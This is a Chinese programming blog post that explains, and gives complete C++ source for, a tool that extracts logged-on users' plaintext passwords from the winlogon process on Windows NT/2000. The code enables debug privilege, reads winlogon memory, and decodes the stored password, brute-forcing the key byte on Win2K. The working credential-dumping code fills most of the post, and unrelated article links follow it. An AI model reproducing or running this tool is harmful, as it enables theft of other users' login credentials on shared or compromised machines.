这家伙很懒什么都没留下

VisualC++信息安全编程（5）获取windows登陆账户密码

indows Logon Process，Windows NT 用户登陆程序，管理用户登录和退出。

因为登陆的域名和用户名是明文存储在winlogon进程里的，而Password是限定了查找本进程用户的密码
<167-174： GetEnvironmentVariableW(L"USERNAME", UserName, 0x400);
GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400);
>，然后到winlogon进程的空间中查找UserDomain和UserName < 590:// 在WinLogon的内存空间中寻找UserName和DomainName的字符串
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0)
&&
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0))
> ，找到后就查后边的加密口令。

其实只要你自己指定用户名和winlogon进程去查找就行了，只要你是管理员，任何本机用msgina.dll图形登陆的用户口令都可以找到。

1. pulist，找到系统里登陆的域名和用户名，及winlogon进程id
2. 然后给每个winlogon进程id查找指定的用户就行了。

example:

C:\Documents and Settings\bingle>pulist
Process           PID User
Idle              0
System            8
smss.exe          164 NT AUTHORITY\SYSTEM
csrss.exe         192 NT AUTHORITY\SYSTEM
winlogon.exe      188 NT AUTHORITY\SYSTEM
wins.exe          1212 NT AUTHORITY\SYSTEM
Explorer.exe      388 TEST-2KSERVER\Administrator
internat.exe      1828 TEST-2KSERVER\Administrator
conime.exe        1868 TEST-2KSERVER\Administrator
msiexec.exe       1904 NT AUTHORITY\SYSTEM
tlntsvr.exe       1048 NT AUTHORITY\SYSTEM
taskmgr.exe       1752 TEST-2KSERVER\Administrator
csrss.exe         2056 NT AUTHORITY\SYSTEM
winlogon.exe      2416 NT AUTHORITY\SYSTEM
rdpclip.exe       2448 TEST-2KSERVER\clovea
Explorer.exe      2408 TEST-2KSERVER\clovea
internat.exe      1480 TEST-2KSERVER\clovea
cmd.exe           2508 TEST-2KSERVER\Administrator
ntshell.exe       368 TEST-2KSERVER\Administrator
ntshell.exe       1548 TEST-2KSERVER\Administrator
ntshell.exe       1504 TEST-2KSERVER\Administrator
csrss.exe         1088 NT AUTHORITY\SYSTEM
winlogon.exe      1876 NT AUTHORITY\SYSTEM
rdpclip.exe       1680 TEST-2KSERVER\bingle
Explorer.exe      2244 TEST-2KSERVER\bingle
conime.exe        2288 TEST-2KSERVER\bingle
internat.exe      1592 TEST-2KSERVER\bingle
cmd.exe           1692 TEST-2KSERVER\bingle
mdm.exe           2476 TEST-2KSERVER\bingle
taskmgr.exe       752 TEST-2KSERVER\bingle
pulist.exe        2532 TEST-2KSERVER\bingle

具体实现代码如下

[cpp]  view plain copy 
      
     
 #include    
 #include    
 #include    
 #include    
   
 typedef struct _UNICODE_STRING   
 {   
     USHORT Length;   
     USHORT MaximumLength;   
     PWSTR Buffer;   
 } UNICODE_STRING, *PUNICODE_STRING;   
   
 // Undocumented typedef's   
 typedef struct _QUERY_SYSTEM_INFORMATION   
 {   
     DWORD GrantedAccess;   
     DWORD PID;   
     WORD HandleType;   
     WORD HandleId;   
     DWORD Handle;   
 } QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;   
 typedef struct _PROCESS_INFO_HEADER   
 {   
     DWORD Count;   
     DWORD Unk04;   
     DWORD Unk08;   
 } PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;   
 typedef struct _PROCESS_INFO   
 {   
     DWORD LoadAddress;   
     DWORD Size;   
     DWORD Unk08;   
     DWORD Enumerator;   
     DWORD Unk10;   
     char Name [0x108];   
 } PROCESS_INFO, *PPROCESS_INFO;   
 typedef struct _ENCODED_PASSWORD_INFO   
 {   
     DWORD HashByte;   
     DWORD Unk04;   
     DWORD Unk08;   
     DWORD Unk0C;   
     FILETIME LoggedOn;   
     DWORD Unk18;   
     DWORD Unk1C;   
     DWORD Unk20;   
     DWORD Unk24;   
     DWORD Unk28;   
     UNICODE_STRING EncodedPassword;   
 } ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;   
   
 typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)  (DWORD, PVOID, DWORD, PDWORD);   
 typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);   
 typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);   
 typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);   
 typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)  (BYTE, PUNICODE_STRING);   
   
 // Private Prototypes   
 BOOL IsWinNT (void);   
 BOOL IsWin2K (void);   
 BOOL AddDebugPrivilege (void);   
 DWORD FindWinLogon (void);   
 BOOL LocatePasswordPageWinNT (DWORD, PDWORD);   
 BOOL LocatePasswordPageWin2K (DWORD, PDWORD);   
 void DisplayPasswordWinNT (void);   
 void DisplayPasswordWin2K (void);   
   
 // Global Variables   
 PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;   
 PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;   
 PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;   
 PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;   
 PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;   
   
 DWORD PasswordLength = 0;   
 PVOID RealPasswordP = NULL;   
 PVOID PasswordP = NULL;   
 DWORD HashByte = 0;  
 wchar_t UserName [0x400];   
 wchar_t UserDomain [0x400];   
   
 int __cdecl main( int argc, char* argv[] )   
 {   
     printf( "\n\t To Find Password in the Winlogon process\n" );  
     printf( " Usage: %s DomainName UserName PID-of-WinLogon\n\n", argv[0] );   
   
     if ((!IsWinNT ())   
             &&   
         (!IsWin2K ()))   
     {   
         printf ("Windows NT or Windows 2000 are required.\n");   
         return (0);   
     }   
   
     // Add debug privilege to PasswordReminder -   
     // this is needed for the search for Winlogon.   
     // 增加PasswordReminder的权限   
     // 使得PasswordReminder可以打开并调试Winlogon进程   
     if (!AddDebugPrivilege ())   
     {   
         printf   
             ("Unable to add debug privilege.\n");   
         return (0);   
     }   
     printf ("The debug privilege has been added to PasswordReminder.\n");   
   
     // 获得几个未公开API的入口地址   
     HINSTANCE hNtDll =   
         LoadLibrary   
             ("NTDLL.DLL");   
     pfnNtQuerySystemInformation =   
         (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress   
             (hNtDll,   
             "NtQuerySystemInformation");   
     pfnRtlCreateQueryDebugBuffer =   
         (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress   
             (hNtDll,   
             "RtlCreateQueryDebugBuffer");   
     pfnRtlQueryProcessDebugInformation =   
         (PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress   
             (hNtDll,   
             "RtlQueryProcessDebugInformation");   
     pfnRtlDestroyQueryDebugBuffer =   
         (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress   
             (hNtDll,   
             "RtlDestroyQueryDebugBuffer");   
     pfnRtlRunDecodeUnicodeString =   
         (PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress   
             (hNtDll,   
             "RtlRunDecodeUnicodeString");   
   
     // Locate WinLogon's PID - need debug privilege and admin rights.   
     // 获得Winlogon进程的PID   
     // 这里作者使用了几个Native API，其实使用PSAPI一样可以   
     DWORD WinLogonPID =   
         argc > 3 ? atoi( argv[3] ) : FindWinLogon () ;   
     if (WinLogonPID == 0)   
     {   
         printf   
             ("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n");   
         printf   
             ("PasswordReminder is unable to find the password in memory.\n");   
         FreeLibrary (hNtDll);   
         return (0);   
     }   
   
     printf("The WinLogon process id is %d (0x%8.8lx).\n",   
             WinLogonPID, WinLogonPID);   
   
     // Set values to check memory block against.   
     // 初始化几个和用户账号相关的变量   
     memset(UserName, 0, sizeof (UserName));   
     memset(UserDomain, 0, sizeof (UserDomain));   
     if( argc > 2 )  
     {     
         mbstowcs( UserName, argv[2], sizeof(UserName)/sizeof(*UserName) );  
         mbstowcs( UserDomain, argv[1], sizeof(UserDomain)/sizeof(*UserDomain) );  
     }else  
     {  
         GetEnvironmentVariableW(L"USERNAME", UserName, 0x400);   
         GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400);   
     }  
     printf( " To find %S\\%S password in process %d ...\n", UserDomain, UserName, WinLogonPID );  
   
     // Locate the block of memory containing   
     // the password in WinLogon's memory space.   
     // 在Winlogon进程中定位包含Password的内存块   
     BOOL FoundPasswordPage = FALSE;   
     if (IsWin2K ())   
         FoundPasswordPage =   
             LocatePasswordPageWin2K   
                 (WinLogonPID,   
                 &PasswordLength);   
     else   
         FoundPasswordPage =   
             LocatePasswordPageWinNT   
                 (WinLogonPID,   
                 &PasswordLength);   
   
     if (FoundPasswordPage)   
     {   
         if (PasswordLength == 0)   
         {   
             printf   
                 ("The logon information is: %S/%S.\n",   
                 UserDomain,   
                 UserName);   
             printf   
                 ("There is no password.\n");   
         }   
         else   
         {   
             printf   
                 ("The encoded password is found at 0x%8.8lx and has a length of %d.\n",   
                 RealPasswordP,   
                 PasswordLength);   
             // Decode the password string.   
             if (IsWin2K ())   
                 DisplayPasswordWin2K ();   
             else   
                 DisplayPasswordWinNT ();   
         }   
     }   
     else   
         printf   
             ("PasswordReminder is unable to find the password in memory.\n");   
   
     FreeLibrary   
         (hNtDll);   
     return (0);   
 } // main   
   
 //   
 // IsWinNT函数用来判断操作系统是否WINNT   
 //   
 BOOL   
     IsWinNT   
         (void)   
 {   
     OSVERSIONINFO OSVersionInfo;   
     OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);   
     if (GetVersionEx   
             (&OSVersionInfo))   
         return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT);   
     else   
         return (FALSE);   
 } // IsWinNT   
   
   
 //   
 // IsWin2K函数用来判断操作系统是否Win2K   
 //   
 BOOL   
     IsWin2K   
         (void)   
 {   
     OSVERSIONINFO OSVersionInfo;   
     OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);   
     if (GetVersionEx   
             (&OSVersionInfo))   
         return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)   
                     &&   
                 (OSVersionInfo.dwMajorVersion == 5));   
     else   
         return (FALSE);   
 } // IsWin2K   
   
   
 //   
 // AddDebugPrivilege函数用来申请调试Winlogon进程的特权   
 //   
 BOOL   
     AddDebugPrivilege   
         (void)   
 {   
     HANDLE Token;   
     TOKEN_PRIVILEGES TokenPrivileges, PreviousState;   
     DWORD ReturnLength = 0;   
     if (OpenProcessToken   
             (GetCurrentProcess (),   
             TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,   
             &Token))   
         if (LookupPrivilegeValue   
                 (NULL,   
                 "SeDebugPrivilege",   
                 &TokenPrivileges.Privileges[0].Luid))   
         {   
             TokenPrivileges.PrivilegeCount = 1;   
             TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;   
             return   
                 (AdjustTokenPrivileges   
                     (Token,   
                     FALSE,   
                     &TokenPrivileges,   
                     sizeof (TOKEN_PRIVILEGES),   
                     &PreviousState,   
                     &ReturnLength));   
         }   
     return (FALSE);   
 } // AddDebugPrivilege   
   
   
 //   
 // Note that the following code eliminates the need   
 // for PSAPI.DLL as part of the executable.   
 // FindWinLogon函数用来寻找WinLogon进程   
 // 由于作者使用的是Native API，因此不需要PSAPI的支持   
 //   
 DWORD   
     FindWinLogon   
         (void)   
 {   
 #define INITIAL_ALLOCATION 0x100   
     DWORD rc = 0;   
     DWORD SizeNeeded = 0;   
     PVOID InfoP =   
         HeapAlloc   
             (GetProcessHeap (),   
             HEAP_ZERO_MEMORY,   
             INITIAL_ALLOCATION);   
     // Find how much memory is required.   
     pfnNtQuerySystemInformation   
         (0x10,   
         InfoP,   
         INITIAL_ALLOCATION,   
         &SizeNeeded);   
     HeapFree   
         (GetProcessHeap (),   
         0,   
         InfoP);   
     // Now, allocate the proper amount of memory.   
     InfoP =   
         HeapAlloc   
             (GetProcessHeap (),   
             HEAP_ZERO_MEMORY,   
             SizeNeeded);   
     DWORD SizeWritten = SizeNeeded;   
     if (pfnNtQuerySystemInformation   
             (0x10,   
             InfoP,   
             SizeNeeded,   
             &SizeWritten))   
     {   
         HeapFree   
             (GetProcessHeap (),   
             0,   
             InfoP);   
         return (0);   
     }   
     DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);   
     if (NumHandles == 0)   
     {   
         HeapFree   
             (GetProcessHeap (),   
             0,   
             InfoP);   
         return (0);   
     }   
     PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =   
         (PQUERY_SYSTEM_INFORMATION) InfoP;   
     DWORD i;   
     for (i = 1; i <= NumHandles; i++)   
     {   
         // "5" is the value of a kernel object type process.   
         if (QuerySystemInformationP->HandleType == 5)   
         {   
             PVOID DebugBufferP =   
                 pfnRtlCreateQueryDebugBuffer   
                     (0,   
                     0);   
             if (pfnRtlQueryProcessDebugInformation   
                     (QuerySystemInformationP->PID,   
                     1,   
                     DebugBufferP) == 0)   
             {   
                 PPROCESS_INFO_HEADER ProcessInfoHeaderP =   
                     (PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60);   
                 DWORD Count =   
                     ProcessInfoHeaderP->Count;   
                 PPROCESS_INFO ProcessInfoP =   
                     (PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER));   
                 if (strstr (_strupr (ProcessInfoP->Name), "WINLOGON") != 0)   
                 {   
                     DWORD i;   
                     DWORD dw = (DWORD) ProcessInfoP;   
                     for (i = 0; i < Count; i++)   
                     {   
                         dw += sizeof (PROCESS_INFO);   
                         ProcessInfoP = (PPROCESS_INFO) dw;   
                         if (strstr (_strupr (ProcessInfoP->Name), "NWGINA") != 0)   
                             return (0);   
                         if (strstr (_strupr (ProcessInfoP->Name), "MSGINA") == 0)   
                             rc =   
                                 QuerySystemInformationP->PID;   
                     }   
                     if (DebugBufferP)   
                         pfnRtlDestroyQueryDebugBuffer   
                             (DebugBufferP);   
                     HeapFree   
                         (GetProcessHeap (),   
                         0,   
                         InfoP);   
                     return (rc);   
                 }   
             }   
             if (DebugBufferP)   
                 pfnRtlDestroyQueryDebugBuffer   
                     (DebugBufferP);   
         }   
         DWORD dw = (DWORD) QuerySystemInformationP;   
         dw += sizeof (QUERY_SYSTEM_INFORMATION);   
         QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw;   
     }   
     HeapFree   
         (GetProcessHeap (),   
         0,   
         InfoP);   
     return (rc);   
 } // FindWinLogon   
   
 //   
 // LocatePasswordPageWinNT函数用来在NT中找到用户密码   
 //   
 BOOL   
     LocatePasswordPageWinNT   
         (DWORD WinLogonPID,   
         PDWORD PasswordLength)   
 {   
 #define USER_DOMAIN_OFFSET_WINNT    0x200   
 #define USER_PASSWORD_OFFSET_WINNT    0x400   
     BOOL rc = FALSE;   
     HANDLE WinLogonHandle =   
         OpenProcess   
             (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,   
             FALSE,   
             WinLogonPID);   
     if (WinLogonHandle == 0)   
         return (rc);   
     *PasswordLength = 0;   
     SYSTEM_INFO SystemInfo;   
     GetSystemInfo   
         (&SystemInfo);   
     DWORD PEB = 0x7ffdf000;   
     DWORD BytesCopied = 0;   
     PVOID PEBP =   
         HeapAlloc   
             (GetProcessHeap (),   
             HEAP_ZERO_MEMORY,   
             SystemInfo.dwPageSize);   
     if (!ReadProcessMemory   
             (WinLogonHandle,   
             (PVOID) PEB,   
             PEBP,   
             SystemInfo.dwPageSize,   
             &BytesCopied))   
     {   
         CloseHandle   
             (WinLogonHandle);   
         return (rc);   
     }   
     // Grab the value of the 2nd DWORD in the TEB.   
     PDWORD WinLogonHeap = (PDWORD) ((DWORD) PEBP + (6 * sizeof (DWORD)));   
     MEMORY_BASIC_INFORMATION MemoryBasicInformation;   
     if (VirtualQueryEx   
             (WinLogonHandle,   
             (PVOID) *WinLogonHeap,   
             &MemoryBasicInformation,   
             sizeof (MEMORY_BASIC_INFORMATION)))   
         if (((MemoryBasicInformation.State & MEM_COMMIT) == MEM_COMMIT)   
                 &&   
             ((MemoryBasicInformation.Protect & PAGE_GUARD) == 0))   
         {   
             PVOID WinLogonMemP =   
                 HeapAlloc   
                     (GetProcessHeap (),   
                     HEAP_ZERO_MEMORY,   
                     MemoryBasicInformation.RegionSize);   
             if (ReadProcessMemory   
                     (WinLogonHandle,   
                     (PVOID) *WinLogonHeap,   
                     WinLogonMemP,   
                     MemoryBasicInformation.RegionSize,   
                     &BytesCopied))   
             {   
                 DWORD i = (DWORD) WinLogonMemP;   
                 DWORD UserNamePos = 0;   
                 // The order in memory is UserName followed by the UserDomain.   
                 // 在内存中搜索UserName和UserDomain字符串   
                 do   
                 {   
                     if ((wcsicmp (UserName, (wchar_t *) i) == 0)   
                             &&   
                         (wcsicmp (UserDomain, (wchar_t *) (i + USER_DOMAIN_OFFSET_WINNT)) == 0))   
                     {   
                         UserNamePos = i;   
                         break;   
                     }   
                     i += 2;   
                 } while (i < (DWORD) WinLogonMemP + MemoryBasicInformation.RegionSize);   
                 if (UserNamePos)   
                 {   
                     PENCODED_PASSWORD_INFO EncodedPasswordInfoP =   
                         (PENCODED_PASSWORD_INFO)   
                             ((DWORD) UserNamePos + USER_PASSWORD_OFFSET_WINNT);   
                     FILETIME LocalFileTime;   
                     SYSTEMTIME SystemTime;   
                     if (FileTimeToLocalFileTime   
                         (&EncodedPasswordInfoP->LoggedOn,   
                         &LocalFileTime))   
                         if (FileTimeToSystemTime   
                             (&LocalFileTime,   
                             &SystemTime))   
                             printf   
                                 ("You logged on at %d/%d/%d %d:%d:%d\n",   
                                 SystemTime.wMonth,   
                                 SystemTime.wDay,   
                                 SystemTime.wYear,   
                                 SystemTime.wHour,   
                                 SystemTime.wMinute,   
                                 SystemTime.wSecond);   
                     *PasswordLength =   
                         (EncodedPasswordInfoP->EncodedPassword.Length & 0x00ff) / sizeof (wchar_t);   
                     // NT就是好，hash-byte直接放在编码中:)   
                     HashByte =   
                         (EncodedPasswordInfoP->EncodedPassword.Length & 0xff00) >> 8;   
                     RealPasswordP =   
                         (PVOID) (*WinLogonHeap +   
                             (UserNamePos - (DWORD) WinLogonMemP) +   
                             USER_PASSWORD_OFFSET_WINNT + 0x34);   
                     PasswordP =   
                         (PVOID) ((PBYTE) (UserNamePos +     
                             USER_PASSWORD_OFFSET_WINNT + 0x34));   
                     rc = TRUE;   
                 }   
             }   
         }   
   
     HeapFree   
         (GetProcessHeap (),   
         0,   
         PEBP);   
     CloseHandle   
         (WinLogonHandle);   
     return (rc);   
 } // LocatePasswordPageWinNT   
   
   
 //   
 // LocatePasswordPageWin2K函数用来在Win2K中找到用户密码   
 //   
 BOOL   
     LocatePasswordPageWin2K   
         (DWORD WinLogonPID,   
         PDWORD PasswordLength)   
 {   
 #define USER_DOMAIN_OFFSET_WIN2K    0x400   
 #define USER_PASSWORD_OFFSET_WIN2K    0x800   
     HANDLE WinLogonHandle =   
         OpenProcess   
             (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,   
             FALSE,   
             WinLogonPID);   
     if (WinLogonHandle == 0)   
         return (FALSE);   
     *PasswordLength = 0;   
     SYSTEM_INFO SystemInfo;   
     GetSystemInfo   
         (&SystemInfo);   
     DWORD i = (DWORD) SystemInfo.lpMinimumApplicationAddress;   
     DWORD MaxMemory = (DWORD) SystemInfo.lpMaximumApplicationAddress;   
     DWORD Increment = SystemInfo.dwPageSize;   
     MEMORY_BASIC_INFORMATION MemoryBasicInformation;   
     while (i < MaxMemory)   
     {   
         if (VirtualQueryEx   
                 (WinLogonHandle,   
                 (PVOID) i,   
                 &MemoryBasicInformation,   
                 sizeof (MEMORY_BASIC_INFORMATION)))   
         {   
             Increment = MemoryBasicInformation.RegionSize;   
             if (((MemoryBasicInformation.State & MEM_COMMIT) == MEM_COMMIT)   
                     &&   
                 ((MemoryBasicInformation.Protect & PAGE_GUARD) == 0))   
             {   
                 PVOID RealStartingAddressP =   
                     HeapAlloc   
                         (GetProcessHeap (),   
                         HEAP_ZERO_MEMORY,   
                         MemoryBasicInformation.RegionSize);   
                 DWORD BytesCopied = 0;   
                 if (ReadProcessMemory   
                         (WinLogonHandle,   
                         (PVOID) i,   
                         RealStartingAddressP,   
                         MemoryBasicInformation.RegionSize,   
                         &BytesCopied))   
                 {   
                     // 在WinLogon的内存空间中寻找UserName和DomainName的字符串   
                     if ((wcsicmp ((wchar_t *) RealStartingAddressP, UserName) == 0)   
                             &&   
                         (wcsicmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0))   
                     {   
                         RealPasswordP = (PVOID) (i + USER_PASSWORD_OFFSET_WIN2K);   
                         PasswordP = (PVOID) ((DWORD) RealStartingAddressP + USER_PASSWORD_OFFSET_WIN2K);   
                         // Calculate the length of encoded unicode string.   
                         // 计算出密文的长度   
                         PBYTE p = (PBYTE) PasswordP;   
                         DWORD Loc = (DWORD) p;   
                         DWORD Len = 0;   
                         if ((*p == 0)   
                                 &&   
                             (* (PBYTE) ((DWORD) p + 1) == 0))   
                             ;   
                         else   
                             do   
                             {   
                                 Len++;   
                                 Loc += 2;   
                                 p = (PBYTE) Loc;   
                             } while   
                                 (*p != 0);   
                         *PasswordLength = Len;   
                         CloseHandle   
                             (WinLogonHandle);   
                         return (TRUE);   
                     }   
                 }   
                 HeapFree   
                     (GetProcessHeap (),   
                     0,   
                     RealStartingAddressP);   
             }   
         }   
         else   
             Increment = SystemInfo.dwPageSize;   
         // Move to next memory block.   
         i += Increment;   
     }   
     CloseHandle   
         (WinLogonHandle);   
     return (FALSE);   
 } // LocatePasswordPageWin2K   
   
   
 //   
 // DisplayPasswordWinNT函数用来在NT中解码用户密码   
 //   
 void   
     DisplayPasswordWinNT   
         (void)   
 {   
     UNICODE_STRING EncodedString;   
     EncodedString.Length =   
         (WORD) PasswordLength * sizeof (wchar_t);   
     EncodedString.MaximumLength =   
         ((WORD) PasswordLength * sizeof (wchar_t)) + sizeof (wchar_t);   
     EncodedString.Buffer =   
         (PWSTR) HeapAlloc   
             (GetProcessHeap (),   
             HEAP_ZERO_MEMORY,   
             EncodedString.MaximumLength);   
     CopyMemory   
         (EncodedString.Buffer,   
         PasswordP,   
         PasswordLength * sizeof (wchar_t));   
     // Finally - decode the password.   
     // Note that only one call is required since the hash-byte   
     // was part of the orginally encoded string.   
     // 在NT中，hash-byte是包含在编码中的   
     // 因此只需要直接调用函数解码就可以了   
     pfnRtlRunDecodeUnicodeString   
         ((BYTE) HashByte,   
         &EncodedString);   
     printf   
         ("The logon information is: %S/%S/%S.\n",   
         UserDomain,   
         UserName,   
         EncodedString.Buffer);   
     printf   
         ("The hash byte is: 0x%2.2x.\n",   
         HashByte);   
     HeapFree   
         (GetProcessHeap (),   
         0,   
         EncodedString.Buffer);   
 } // DisplayPasswordWinNT   
   
 //   
 // DisplayPasswordWin2K函数用来在Win2K中解码用户密码   
 //   
 void   
     DisplayPasswordWin2K   
         (void)   
 {   
     DWORD i, Hash = 0;   
     UNICODE_STRING EncodedString;   
     EncodedString.Length =   
         (USHORT) PasswordLength * sizeof (wchar_t);   
     EncodedString.MaximumLength =   
         ((USHORT) PasswordLength * sizeof (wchar_t)) + sizeof (wchar_t);   
     EncodedString.Buffer =   
         (PWSTR) HeapAlloc   
             (GetProcessHeap (),   
             HEAP_ZERO_MEMORY,   
             EncodedString.MaximumLength);   
     // This is a brute force technique since the hash-byte   
     // is not stored as part of the encoded string - :>(.   
     // 因为在Win2K中hash-byte并不存放在编码中   
     // 所以在这里进行的是暴力破解   
     // 下面的循环中i就是hash-byte   
     // 我们将i从0x00到0xff分别对密文进行解密   
     // 如果有一个hash-byte使得所有密码都是可见字符，就认为是有效的   
     // 这个算法实际上是从概率角度来解码的   
     // 因为如果hash-byte不对而解密出来的密码都是可见字符的概率非常小   
     for (i = 0; i <= 0xff; i++)   
     {   
         CopyMemory   
             (EncodedString.Buffer,   
             PasswordP,   
             PasswordLength * sizeof (wchar_t));   
         // Finally - try to decode the password.   
         // 使用i作为hash-byte对密文进行解码   
         pfnRtlRunDecodeUnicodeString   
             ((BYTE) i,   
             &EncodedString);   
         // Check for a viewable password.   
         // 检查解码出的密码是否完全由可见字符组成   
         // 如果是则认为是正确的解码   
         PBYTE p = (PBYTE) EncodedString.Buffer;   
         BOOL Viewable = TRUE;   
         DWORD j, k;   
         for (j = 0; (j < PasswordLength) && Viewable; j++)   
         {   
             if ((*p)   
                     &&   
                 (* (PBYTE)(DWORD (p) + 1) == 0))   
             {   
                 if (*p < 0x20)   
                     Viewable = FALSE;   
                 if (*p > 0x7e)   
                     Viewable = FALSE;   
                 //0x20是空格，0X7E是~，所有密码允许使用的可见字符都包括在里面了   
             }   
             else   
                 Viewable = FALSE;   
             k = DWORD (p);   
             k++; k++;   
             p = (PBYTE) k;   
         }   
         if (Viewable)   
         {   
             printf   
                 ("The logon information is: %S/%S/%S.\n",   
                 UserDomain,   
                 UserName,   
                 EncodedString.Buffer);   
             printf   
                 ("The hash byte is: 0x%2.2x.\n",   
                 i);   
         }   
     }   
     HeapFree   
         (GetProcessHeap (),   
         0,   
         EncodedString.Buffer);   
 }  

你可能感兴趣的:(VC++)

静态库、动态库及导入库 summer_l_jx C++知识静态库动态库及导入库
静态库1.静态库扩展名为.lib，静态链接(即代码会直接编译进可执行文件)。静态库是一个或多个obj文件的打包。2.在VC中使用静态库的方法：方法一：在项目属性中添加附加依赖项。若库目录不在系统和当前目录，选中工程，单击右键，属性-->VC++目录，在库目录中添加库文件所在路径；选中工程，单击右键，属性-->链接器-->输入，在"附加依赖项“右边选择编辑,输入要包含的静态库名称。方法二：在项目中直
详解TCP三次握手（建立连接）和四次握手（释放连接） dvlinker 网络编程与网络问题分享 C/C++实战专栏 tcp/ip 网络协议 TCP连接三次握手四次挥手
VC++常用功能开发汇总（专栏文章列表，欢迎订阅，持续更新...）https://blog.csdn.net/chenlycly/article/details/124272585<
利用IOCP实现高性能Socket服务器端源码赵阿萌
本文还有配套的精品资源，点击获取简介：IOCP是Windows中的高效I/O模型，适用于大量并发I/O操作，通过分离I/O操作与通知机制，实现非阻塞式处理请求，提高服务器性能。该示例源码展示了一个基于IOCP和Socket技术的游戏服务器端程序，支持TCP/IP和UDP协议，并且在VC++环境中开发。项目中关键组件包括服务器的启动和初始化、接受新连接、数据收发、错误处理与资源管理以及线程管理和同步
VC++ 获取目的IP的路由 liulilittle C/C++c++前端开发语言
GetBestRoute函数获取到目的IP的最佳匹配路由。第一个参数为：destination（目的IP）第二个参数为：source（源IP）通常不需要指定第二个source，这个一般用来匹配具体某一个网卡接口路由的，即source等于本机某个网卡的接口IP或网关。GetBestInterface函数是获取到目的IP的最佳网卡接口IFR_INDEX。boolRouter::GetBestRoute
C++ typename关键字的起源与用法 dvlinker C/C++实战专栏 C++关键字 typename
目录1、起因2、typename的常见用法3、typename的来源4、一些关键概念4.1、限定名和非限定名4.2、依赖名和非依赖名4.3、类作用域5、引入typename的真实原因5.1、一个例子5.2、问题浮现5.3、千呼万唤始出来5.4、不同编译器对错误情况的处理5.5、使用typename的规则5.6、其它例子5.7、再看常见用法6、写在结尾VC++常用功能开发汇总（专栏文章列表，欢迎订阅
Stack cookie instrumentation code detected a stack-based buffer overrun. ComputerInBook VC++c++Windows应用编程 vc++栈越界 vc++调式
在vc++下面出现这个调试错误：Stackcookieinstrumentationcodedetectedastack-basedbufferoverrun.(栈检测指令检测到基于栈的缓存区被某种操作越界操作了。)原因：在栈上执行了某种操作，例如，内存复制(memcpy)，内存设置(memset)，缓冲区格式化(sprintf)，等等，查是这个操作已经越过了申请的栈空间的大小。系统在退出函数调用
java手机小游戏源码_Java手机版数独小游戏（J2me）JAVA游戏源码下载 weixin_39748773 java手机小游戏源码
数独游戏，相信朋友们都知道的，以前也经常玩的，用VB、VC++和Delphi版编写的都在网上宣布过，今天放出一个鉴于Java的J2me手机版的，大致看一下截图，这是在Java模拟机运行的界面，带有Java源码，学习J2me编程的朋友有资料看了。Java手机版数独小游戏(J2me)(1folders,2files,1.38KB,754.03KBintotal.)源码(1folders,2f
Windows系统中搭建Go语言开发环境详解 dvlinker C/C++实战专栏 C/C++软件开发从入门到实战 windows golang 开发语言
目录1、Go语言简介2、安装Git3、Go工具链（编译器）安装3.1、环境变量GOROOT3.2、环境变量GOPATH3.3、Go常用命令4、包管理4.1、gomodule4.2、gopm5、编写Go语言代码的IDE或编辑工具5.1、基于VSCode的Go开发环境5.2、GoLand5.3、Vim5.4、其他Go代码编写工具6、Go语言学习资料分享VC++常用功能开发汇总（专栏文章列表，欢迎订阅，
AccountsRt.dll出现0xc0000020未被指定在Windows运行用户7756535831965 windows
AccountsRt.dll为MicrosoftWindows的一个动态链接库。由于很多常用软件都是采用MicrosoftVisualStudio编写的，所以这类软件的运行需要依赖微软VisualC++运行库，比如像QQ、迅雷、Adobe软件等等，如果没有安装VC++运行库或者安装的版本不完整，就可能会导致这些软件启动时报错，提示缺少库文件。下面从解决实际问题的角度上，推荐几种有效方法！方法1：下
一文带你了解三大开源关系型数据库：SQLite、MySQL和PostgreSQL dvlinker C/C++实战专栏 C/C++软件开发从入门到实战数据库开源 SQLite MySQL PostgreSQL
